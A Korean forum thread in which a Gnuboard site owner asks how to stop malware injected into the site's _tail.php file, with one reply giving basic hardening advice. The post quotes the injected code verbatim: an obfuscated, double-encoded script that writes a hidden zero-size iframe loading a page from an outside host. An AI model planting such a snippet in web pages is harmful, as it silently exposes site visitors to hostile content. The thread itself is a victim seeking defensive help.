제 그누보드에 악성코드가 삽입되어 있습니다. 정보
제 그누보드에 악성코드가 삽입되어 있습니다.본문
메뉴부터 하나 하나 공부하면서 만들고 있습니다.
어제 저녁까지도 아무 이상이 없었는데 오늘 아침에 보니까
사진과 같은 오류가 있어서 살펴봤더니
_tail.php 에 이상한 코드가 삽입되어 있습니다.
이런것을 근본적으로 차단 하려면 어찌해야 하나요?
_tail.php 에 삽입되어진 코드
<?
if (!defined("_GNUBOARD_")) exit; // 개별 페이지 접근 불가
include_once("$g4[path]/tail.php");
echo "<script>var c ='%25%33%43%69%66%72%61%6d%65%25%32%30%73%72%63%25%33%44%25%32%32%68%74%74%70%25%33%41%25%32%46%25%32%46%6b%6f%6e%64%6f%32%36%34%2e%72%73%6a%70%2e%6e%65%74%25%32%46%73%75%6d%61%69%25%32%46%69%6d%67%2d%70%25%32%46%69%6d%67%62%61%72%25%32%46%69%6e%64%65%78%2e%70%68%70%25%32%32%25%32%30%77%69%64%74%68%25%33%44%25%32%32%30%25%32%32%25%32%30%68%65%69%67%68%74%25%33%44%25%32%32%30%25%32%32%25%32%30%66%72%61%6d%65%62%6f%72%64%65%72%25%33%44%25%32%32%30%25%32%32%25%33%45%25%33%43%25%32%46%69%66%72%61%6d%65%25%33%45';var d=unescape(unescape(c));document.write(unescape(d));</script>";
?>
이로 인해서 나타나는 오류
댓글 전체
저같은 경우는 호스팅을 cafe24 를 쓰다가 그랬는데 일단은 ftp 비밀번호부터 바꾸신뒤에
호스팅 업체에 문의 하여 ssh 로 사용하시는것이 그나마 덜 공격당하는 일이 되시겠네요
저런 악성코드는 주로 index 에 많이 들어오니.. 그날그날 인덱스를 손보신다면 일단은 백업을 해놓으신뒤에
바로바로 깔아주시면서 해결책이 나올때까지 버티시는게 좋을거 같네요
